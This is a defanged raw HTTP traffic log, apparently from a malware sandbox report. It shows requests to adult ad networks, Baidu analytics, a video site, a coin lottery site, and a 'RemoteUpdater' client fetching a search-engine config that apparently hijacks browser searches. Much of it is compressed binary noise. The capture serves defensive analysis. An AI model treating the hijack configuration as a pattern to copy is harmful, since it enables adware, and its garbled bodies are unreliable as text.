68..document.write('<script charset="utf-8" src="hXXp://s2.qhimg.co
m/static/ab77b6ea7f3fbf79.js"></script>')..0..HTTP/1.1 200 OK
..Date: Wed, 01 Jun 2016 07:03:42 GMT..Server: nginx/1.2.9..Content-Ty
pe: application/x-javascript; charset=utf-8..Transfer-Encoding: chunke
d..X-Powered-By: PHP/5.2.5..Last-Modified: Thu, 24 Mar 2016 08:46:53 G
MT..Cache-Control: max-age=600..Age: 1..X-Via: 1.1 hdwt39:88 (Cdn Cach
e Server V2.0), 1.1 db77:2 (Cdn Cache Server V2.0)..Connection: keep-a
live..68..document.write('<script charset="utf-8" src="hXXp://s2.qh
img.com/static/ab77b6ea7f3fbf79.js"></script>')..0..

GET /ads?spot_id=2007013&rand=1853651284&impid=27_1484906106350967_9603&uuid=f262600c-ccdc-4fa0-a68a-ebaa6afeceec HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343951&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
371.............U.n.6...VE...-..d..R.=...4(..."c1.EV...|}...>...1r.
..;......i..n.i..{........r.4..F......E....px0.....SUt...8.K/.....!.&.
.%g1.u.I...)u...d.(R.....XE.Z*......."b...........2V......M.[.r.x~....
?..z.....G!k-.....5/...5.Y..bP......j:\|1..f.;.Y1J...<.....O..^....
j../..}.xJ......;.I.;.!MhQ...>......d8X... . .X....d......E0..%....
..... .<..X..,|....X..IV.a.i.h...5>.. z....$.z.e.]..A.B...f..|..
...K.......f..4Y..z.O.P$..R.f..NiS..&.<..*..t.O...),C0.h4...$.0....
.......D.|>./>XH.M....:.p...B<......njX.Ip.[..5..b.`Z.....2..
....}..O........._......./..;.3Zd<.( R.{.0..r...W..k..i..4.y.......
/.=T......>......F.6.W-].!<I....J.[.!,.....i.o..:......2.~....S.
..W5<w..!..R..I....1.a4..!.3.#..;.....e..Vo.<C....#....ZL..9o..F
..:.c3..?...c<.jd....T..b;#.o.hV.?F.t....9......D..v.}Ct.a.,..iN.V.
91....,&".H...3...#*.5:.C....J.......VMD....i....*B....U...S...)..8...
?.%............[.>.....0..

GET /ads?zone_id=1343941&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=f6d622d2-74ce-4b18-9176-428ec07c8fc1; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1343941" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1343941_1484906106" name="1343941_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=53_1484906106291540_30079&uuid=f6d622d2-74ce-4b18-9176-428ec
07c8fc1" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1343941" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAADFgRQAxYEUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hemtZz9E4T5Ml0FxIsOi7b9e6CUfixrWj0zyePKODPs2fGk99YKgmd96V7bd6iaxaASWVta4Uw2mVxa4JJOvd72JpgyGS2PR8XsdZpL87BcDLqEmShyhjsRfsafQQCZPFA_hKVZqjQdX3ELYetFcbXVAqCVOv1PdrOCh9nJwGQ_nznrRLps1ozknMgd89vuQqyu2i2zBsgyoqwlq3M2Ei-nUNOiBXoVGinGT2gWsz02E60z1_fh9cnGM_ZO7FTFH5ur-yg7X3l5JNppNRnOcHHgQMIr1IchhqvYCJpDCaDLQ8X-7NyDg5ouL6a6ILIEXLFe7KV8Q7Jc_-mR7kLuhqxXj3OZDFLEZECiJ1zoySaZfcuRvd5f3QK8YEjeW6nSRRe&v=404&seq=4 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:11 GMT

Cache-Control: no-cache

0..

GET /hm.js?53b7374a63c37483e5dd97d78d9bb36e HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: hm.baidu.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: max-age=0, must-revalidate

Content-Encoding: gzip

Content-Length: 10345

Content-Type: application/javascript

Date: Fri, 20 Jan 2017 09:55:08 GMT

Etag: 42f814800eee57b09c8807df25164de0

P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Server: apache

Set-Cookie: HMACCOUNT=8D6A0064473D619A; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
...........e...(function(){var h={},mt={},c={id:"53b7374a63c37483e5dd9
7d78d9bb36e",dm:["iqiyi.com"],js:"tongji.baidu.com/hm-web/js/",etrk:[{
id:"pc-buy-main-id-for-hmt-1",eventType:"onclick"},{id:"pc-buy-main-id
-for-hmt-2",eventType:"onclick"},{id:"pc-buy-main-id-for-hmt-3",eventT
ype:"onclick"},{id:"pc-buy-main-id-for-hmt-300",eventType:"onclick"},{
id:"pc-buy-main-id-for-hmt",eventType:"onclick"},{id:"pc-buy-main-id-f
or-hmt-100",eventType:"onclick"},{id:"pc-buy-main-id-for-hmt-101",even
tType:"onclick"},{id:"pc-buy-main-id-for-htm-19",eventType:"onclick"},
{id:"pc-buy-main-id-for-htm-110",eventType:"onclick"}],icon:'',ctrk:tr
ue,align:1,nv:-1,vdur:1800000,age:31536000000,rec:0,rp:[],trust:0,vcar
d:0,qiao:0,lxb:0,conv:0,med:0,cvcc:{q:/tencent:\/\/|qq\.(com|htm)|kefu
|openkf|swt|zoos|53kf|doyoo|looyu|leyu|zixun|chat|talk|openQQ|open_ask
|online/i},cvcf:['feedbacksubmit'],apps:''};.Zk{....._A.Y..`J..]1.6qn.
I.=M.......PbD.*IIv$....x..$...S..u0.wf..yb....@.}.8.}.:.*...9.......^
..>:.E.H.... .~h/.2.ff....gqb.R.<..(.z.?..5h$bo...U...B.v.......
.3...'..x....wC).j.F......q.Z.....h..SY.UT.vU......MKSz.fr...j. D...w.
M..xc.^"edm...v.>..k.=h..`:...`B.'..2.9..U.t...-(....Je......829s.O
.k..a..?:...%7.s.I&...`!MaM...B7J.Rf.".K..u...R\. ....%./*..P.....;._.
...(.^^/.D..$.,~....,...I..>r..Jo.H...j.Hkm.t..l.@...e....AI.i6....
...ww(.....y.7JG||o2L....4....E.r,..".X|vs).G>j..........:.)..J..H`
./`....8P.A...R.4.Mne|.._H.qi.....Pyb..~.....hp..9N...n..I.......#.PF.
lf....v.T...I..r.............w^...IB.g ..g...t. T..L..hN....#...a.<<< skipped >>>

GET /hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&et=0&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=1570361624&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1&tt=ã€Šæ˜Žæ˜Ÿå¿—æ„¿ã€‹J-starç»„åˆç»ƒä¹ å®¤æ—¥å¸¸-ç”µè§†å‰§-é«˜æ¸…è§†é¢‘â€“çˆ±å¥‡è‰º HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: hm.baidu.com

Connection: Keep-Alive

Cookie: HMACCOUNT=8D6A0064473D619A


HTTP/1.1 200 OK

Cache-Control: private, max-age=0, no-cache

Content-Length: 43

Content-Type: image/gif

Date: Fri, 20 Jan 2017 09:55:09 GMT

Pragma: no-cache

Server: apache

X-Content-Type-Options: nosniff
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Content-Length: 43..Content-Type: i
mage/gif..Date: Fri, 20 Jan 2017 09:55:09 GMT..Pragma: no-cache..Serve
r: apache..X-Content-Type-Options: nosniff..GIF89a.............!......
.,...........L..;....


GET /hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&ep={"netAll":1466,"netDns":1383,"netTcp":79,"srv":583,"dom":2056,"loadEvent":6899,"qid":"","bdDom":0,"bdRun":0,"bdDef":0}&et=87&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=2074899456&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: hm.baidu.com

Connection: Keep-Alive

Cookie: HMACCOUNT=8D6A0064473D619A


HTTP/1.1 200 OK

Cache-Control: private, max-age=0, no-cache

Content-Length: 43

Content-Type: image/gif

Date: Fri, 20 Jan 2017 09:55:11 GMT

Pragma: no-cache

Server: apache

X-Content-Type-Options: nosniff

GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Cache-Cont
rol: private, max-age=0, no-cache..Content-Length: 43..Content-Type: i
mage/gif..Date: Fri, 20 Jan 2017 09:55:11 GMT..Pragma: no-cache..Serve
r: apache..X-Content-Type-Options: nosniff..GIF89a.............!......
.,...........L..;..

GET /clt/config/SearchEngine_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:07 GMT

Content-Type: application/octet-stream

Content-Length: 3572

Last-Modified: Mon, 05 Dec 2016 05:28:11 GMT

Connection: close

ETag: "5844faeb-df4"

Accept-Ranges: bytes
..[.1.6.8.8.].....C.o.d.e.P.a.g.e.=.u.t.f.8.....E.x.t.P.a.r.a.m.=.&.n.
=.y.&.c.a.t.e.g.o.r.y.I.d.=.&._.s.o.u.r.c.e.=.s.u.g.....F.o.r.m.a.t.=.
h.t.t.p.:././.s...1.6.8.8...c.o.m./.s.e.l.l.o.f.f.e.r./.o.f.f.e.r._.s.
e.a.r.c.h...h.t.m.?.k.e.y.w.o.r.d.s.=.....N.a.m.e.=.?....].]....T.y.p.
e.=.2.....[.3.6.0.].....C.o.d.e.P.a.g.e.=.u.t.f.8.....F.o.r.m.a.t.=.h.
t.t.p.:././.w.w.w...s.o...c.o.m./.s.?.i.e.=.u.t.f.-.8.&.q.=.....N.a.m.
e.=.3.6.0..d"}....T.y.p.e.=.1.....[.P.r.o.v.i.d.e.r.].....D.e.f.a.u.l.
t.=.b.a.i.d.u.....N.a.m.e.=.g.o.o.g.l.e.,.b.a.i.d.u.,.b.a.i.d.u.M.o.b.
l.i.e.,.b.i.n.g.,.y.o.u.d.a.o.,.S.o.g.o.u.,.S.o.s.o.,.3.6.0.,.t.a.o.b.
a.o.I.t.e.m.,.t.a.o.b.a.o.S.h.o.p.,.y.a.h.o.o.,.T.m.a.l.l.,.1.6.8.8.,.
j.d.,.a.l.i.e.x.p.r.e.s.s.....[.S.o.g.o.u.].....C.o.d.e.P.a.g.e.=.g.b.
k.....F.o.r.m.a.t.=.h.t.t.p.:././.w.w.w...s.o.g.o.u...c.o.m./.w.e.b.?.
q.u.e.r.y.=.....N.a.m.e.=..d.r....T.y.p.e.=.1.....[.S.o.s.o.].....C.o.
d.e.P.a.g.e.=.u.t.f.8.....E.x.t.P.a.r.a.m.=.&.p.i.d.=.s.b...i.d.x.&.c.
h.=.s.b...c...i.d.x.&.c.i.d.=.s...i.d.x...s.m.b.....F.o.r.m.a.t.=.h.t.
t.p.:././.w.w.w...s.o.s.o...c.o.m./.q.?.i.e.=.u.t.f.-.8.&.w.=.....N.a.
m.e.=..d.d....T.y.p.e.=.1.....[.T.m.a.l.l.].....C.o.d.e.P.a.g.e.=.g.b.
k.....F.o.r.m.a.t.=.h.t.t.p.:././.l.i.s.t...t.m.a.l.l...c.o.m./.s.e.a.
r.c.h._.p.r.o.d.u.c.t...h.t.m.?.q.=.....N.a.m.e.=.)Y s....T.y.p.e.=.2.
....[.a.l.i.e.x.p.r.e.s.s.].....C.o.d.e.P.a.g.e.=.u.t.f.8.....F.o.r.m.
a.t.=.h.t.t.p.:././.w.w.w...a.l.i.e.x.p.r.e.s.s...c.o.m./.w.h.o.l.e.s.
a.l.e.?.S.e.a.r.c.h.T.e.x.t.=.....N.a.m.e.=...VS......T.y.p.e.=.2.<<< skipped >>>

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.qiyipic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Expires: Sat, 20 Jan 2018 09:55:12 GMT

Cache-Control: max-age=31536000

Content-Type: text/xml

Accept-Ranges: bytes

ETag: "1691341"

Last-Modified: Thu, 04 Aug 2011 10:20:41 GMT

Content-Length: 227

Server: Apache 1.3.29

Date: Fri, 20 Jan 2017 09:55:12 GMT

Connection: keep-alive
<?xml version="1.0"?>....<cross-domain-policy> <site-co
ntrol permitted-cross-domain-policies="all" />..    <allow-acces
s-from domain="*" /> ..    <allow-http-request-headers-from doma
in="*" headers="*"/>..</cross-domain-policy>....


GET /common/fix/default_player_16_9.png?arg=01000011010000000000 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: VVV.qiyipic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/png

Accept-Ranges: bytes

ETag: "54025869"

Last-Modified: Wed, 25 Jul 2012 07:07:48 GMT

Content-Length: 2165

Server: Apache 1.3.29

Cache-Control: max-age=29014038

Expires: Fri, 22 Dec 2017 05:22:30 GMT

Date: Fri, 20 Jan 2017 09:55:12 GMT

Connection: keep-alive
.PNG........IHDR...s...M......3[;....tEXtSoftware.Adobe ImageReadyq.e&
lt;....IDATx...Io.M.....[.8.F!..}....7....._...........XB...^.._?....3
.;6.I.4.=........g.799y.R..j.Z..7%.L...t,...R)V..mVzT2.L.P(..x$@...-.l
6.o.....i`...&....i`...&....ib`..&....ib`.......ib`.D.D.....>.$.h67
7.///o....& ........X...[..f.M.k&.j....|^[[......f.R.f.w........x.....
n*.J..l|...I........tyff.j......D.......4....`......h `B.g.......p.^..
...H.A.n....I$..m.Nh.....4:...Nh.............{.....J.\.wR. ..d2.#G..O.
<9.....n[(M.[D.|.R~...j.....bL....<..,..n....]..fE.|.u.I0.......
....}..siiiC'(d..I.SG.k..I.s......Q..:t(..cl}|'.%........OXhh&.d..J...
O.g=......X.7......._.mTW.."v.....;....%..;v,.K....G....>.........%
..........ja..9......'YP...&d....s..:....9g.5......_...>}zH.I......
....>......*k0..i..|.$.....Q. ..I.FXm,..'|....N..;w...5B...;.h..G..
...pC..I.............s.S.Nm{&s...v.&.....X.Jk .&..e2.I..p.P.6.V..(..{.
..%P ...'O.....a...7_.x..@...^.N....^x....F...hE.rlnn........z...N.n.W
.......b...6...........Y. .... M.....s........12......FL..!.a@.xd.z|hV
...4..".Q[U.....2.i......WG....:.... .w........{...A....g%.....7.,....
..kA.4s.v.xG.P'kHn>(....f.L....d.X..C.~R.....c:zR.......x......8c:.
.....u~&........Z.....Q...m.A..x.t..".-7....L&.?..&..L...p.[HBUg\.Z.U.
...|...U6.3`b....c?..n..e..W.\...`.D...7....P.Pl ..........Z.O.>...
...)..O.x.N.[j8<...[E..@.u.H.|o..dk..N.d<)S.......qp...A....a{.L
.5J..N5..Wz.....5 ......f...c.x.bj^..o$..$..S`...k.~..Nd....$F...]..A}
^.. .&{m..1......p./_.\....)0.!R...x$e.,....!5#k..C.....&....L..e.<<< skipped >>>

GET /static/js/geetest.0.0.0.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: static.geetest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:19 GMT

Content-Type: application/javascript

Content-Length: 41368

Connection: close

Cache-Control: max-age=86400

ETag: 5b657ed819bcddb858eb58baa064fa76

Expires: Sat, 21 Jan 2017 09:06:40 GMT

Access-Control-Allow-Origin: *

Accept-Ranges: bytes

X-Varnish: 2921431218 2921298870

Age: 2919

Via: 1.1 varnish

X-Cache: HIT
..."5.9.0";"use strict";!function(a,b){a.Geetest=b(a,a.jQuery||a.Zepto
||a.ender||a.$),"function"==typeof define&&define.amd?define("Geetest"
,["jquery"],function(c){return b(a,c)}):"undefined"!=typeof exports&&(
exports=b(a))}(this,function(a,b){function c(a,b){if(!(this instanceof
 c))return new c(a,b);if("string"!=typeof a.gt)throw new Error(e.gtErr
or);var d=this;return d.id=o(),k.z(d.id),Q.z(d.id,d),k.B("error",ra.on
Error,d.id),d.config=B(a,d),d.config.protocol=d.config.https?"hXXps://
":location.protocol "//","hXXps://"===d.config.protocol&&(d.config.htt
ps=!0),b||a.offline?(P(!1,a,d),a.popupbtnid&&d.bindOn("#" a.popupbtnid
)):G(d.config.apiserver "get.php?" m(a),P,d),O(d),d}function d(a,b){re
turn a.type||(a.type="slide"),new d[a.type](a,b)}var e={gtError:".....
....gt............",challengeError:".........challenge............",do
mSelectorError:"...............ID............DOM......",callbackError:
".................................",getError:"initGeetest.............
.......................gt...challenge"},f={};f.serial=function(a,b){va
r c=a.length,d=[!1],e=1,f=function(g,h){return h?(d=[!0],void b.apply(
null,d)):(d[e]=g,e =1,void(e>c?b.apply(null,d):a[e-1](f)))};a[0](f)
},f.parallel=function(a,b){for(var c=a.length,d=[!1],e=0,f=function(a)
{return function(f,g){if(e!==-1){if(g)return d=[!0],b.apply(null,d),d=
[],void(e=-1);e =1,d[a]=f,e===c&&b.apply(null,d)}}},g=1;g<=c;g =1)a
[g-1](f(g),g)};var g={},h={},i=function(a){return h[a]&&h[a].content},
j=function(a,b,c){b in h?"loaded"===h[b].status?c&&c(h[b].content)<<< skipped >>>

GET /Public/zui/css/zui-theme.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a4ed-2941-515d01ed1cc80"

Content-Encoding: gzip
7ab...............n.6.n.....8......A..h.$...4....]..(H\{....!..)Q.v..h
.l.x..<8..gx.....z.....9..s.\.~..y.g.9....3.ooo?.b.$.g1.s.~9.[1W...
f....4.%.|.i....Gb..4.............|..|.k...HV.....;_q{y.?....P@.Zl..&l
t;Z....../....#)n.o.....z.\..D..>....S\<.PQ...B>..v.=d.S.ZFx.
p.0K......[...u..JO..\j.8`.#....(.I....yH.2....!g...6.`n....B.......1s
|zt.=..[4Cw..y...........w-......hb..6A..hxG.(..T.I.....t\2..t.......q
.....U...?.D..$...A...k%.R...8.i.z#..o..*Dj...1yAK.h...f.F.lR..)..D..N
;o.S..XrR.X..?X....5v|....?i>kt.o...p.g.....{.D..12....'.@3.....ca.
V>.`.$z.1.0.?iK>...}j..4i....f....*..iU...... I...\I9ie....jI.8D
W../..._..jvW...p.M.P5.R6..}?\.:<3rd..Q.M..z......8=0.t....F..6.#.Z
7.v.....d..m.......l?.......E...z...B4.......".4=c.M.x.M..k.B..`'!g.MJ
..txv3.qg..5d..Y...js...5.Xz.-/..e5.<.1w......g2c..|.)...%s..-wbF..
...1...{....W.I@..b..1...Tm.KG.&;.U3J..y...FOJ"....G..N.A.)..ar...;.pO
.......:...0...$...=.a.....|...p.....*q.B]..o."ZG.$.u..8..k....*u.....
.._.....W...#...[9.T,.<E.PBIp^..x`.x.2.3._...4.(E.I&....n..s......R
....L..y.C....r.....c.Hrm.'%..s......YE..../B.ogQJb......a..q...s.;.Y.
......Do<U....(>..I..B..E...N.%..eyB...2FS=A.C.x......]).f....|.
|....u....1.<.,.`..*....x.l..8.zgO;j.kr..(Q.E..ue..5.M:%e.../Bn....
h..J..Z.....BvS#.XI......IR.L..h...<......yP.DU..b.<.ad.h" .(.M.
..2.,....6..tF...6..YH..75...D.[..8./jV:.=.....A.NB...w~.pG...(...b9..
.o.m.d..d..tg...Y6..j7M..*..!>-l...)x:....p....9..V..ec........$..g
.x.......!....{ ...T.o<..9.\..w5......4...U....S(D.2..t.cQ..g..<<< skipped >>>

GET /Addons/CheckIn/Static/css/check.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: text/css

Connection: keep-alive

Last-Modified: Mon, 18 May 2015 08:49:36 GMT

ETag: "a584a4-399-5165746012800"

Accept-Ranges: bytes

Content-Length: 921
.checkdiv {.  overflow: hidden;.  border-bottom: 1px solid #f0f0f0;.  
background-color: #FFFFFF;.  height: 42px;.  line-height: 42px;.}..che
ckdiv .ico_calendar {.  display: inline-block;.  vertical-align: middl
e;.  width: 30px;.  height: 30px;.}..checkdiv .btn-sign {.  color: #33
3333;.  font-size: 16px;.  vertical-align: middle;.  display: inline-b
lock;.  margin-left: 5px;.}..check_rank {.  margin-top: -1px;.  backgr
ound-color: white;.  border-top: 1px solid #f0f0f0;.  color: #333333;.
}..check_rank .check_rank_list {.  margin-bottom: 10px;.  padding: 10p
x 15px 0 15px;.  display: block;.}..check_rank .check_rank_list li {. 
 list-style: none;.}..check_rank a {.  color: #333333;.}..check_date {
.  font-size: 12px;.}..check-tab {.  height: 45px;.  line-height: 42px
;.  background: #fff;.}..check-tab > div {.  cursor: pointer;.}..ch
eck-tab > div.active,..check-tab > div:hover {.  border-bottom: 
3px solid orange;.}.HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Fri, 
20 Jan 2017 09:55:15 GMT..Content-Type: text/css..Connection: keep-ali
ve..Last-Modified: Mon, 18 May 2015 08:49:36 GMT..ETag: "a584a4-399-51
65746012800"..Accept-Ranges: bytes..Content-Length: 921...checkdiv {. 
 overflow: hidden;.  border-bottom: 1px solid #f0f0f0;.  background-co
lor: #FFFFFF;.  height: 42px;.  line-height: 42px;.}..checkdiv .ico_ca
lendar {.  display: inline-block;.  vertical-align: middle;.  width: 3
0px;.  height: 30px;.}..checkdiv .btn-sign {.  color: #333333;.  font-
size: 16px;.  vertical-align: middle;.  display: inline-block;.  m<<< skipped >>>

GET /Public/static/qtip/jquery.qtip.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:17 GMT

Content-Type: text/css

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a2a9-2b6b-515d01ed1cc80"

Content-Encoding: gzip
c5d.............Z[o.:.~v......&=.,...E..\...hw.,v.....m...*.....}g..D.
.....M.....7..../....V&.../...G..{.......r.d.u7..~@..y..z.o.3..j...q..
.T..9;^..A........$.k."v.V.$S1......D..q(R............Er!.Ld.~.~....W.
.g.../y.f.f..O<e.S.w0........F.>..h..q6ct.;).....u.?F.z.Y6.....&
gt;^.../:..d.U<c|..h......e>c..,....[r.T.B.%....X.8..l..w/.|=c0S
......M...U.{...W...X..d,..@*C....9..X.#Fy.......<T........W3....4.
n.-`3..x[....x.....\8....t...J.[.e..Xo...C..H..@@'.{....O9.i.......q..
.<.s..|.!.....tmg..n"...X....D.{C...Z..~gUr1.(.|.........[...{....o
..-"..6.......e.k....vu..:$_.dH..O.7..H..6.T:........@..yf.6"...... .A
,1Lk..0c....aG/T.[.).....3...K.'..*.dO?*.?.^.. .)H.....|..^..Md.k\]...
...`@..Wl).....~.r.Vz.X.[....7... TFz..Z|..$...X1.B.D_lt.......t...6.6
..gh.rx*......0....[....iC.P).1.....h.0........Ct.....W...I.`.......k.
D...(.x.t.#..($i..............D*.....e..f.1..|.u.*.*.....?^*..sz;.1...
.\.;.I.IPL.b..j..%....._.l........Gf.E.=.;..a.......h...[....B.Z.;H_..
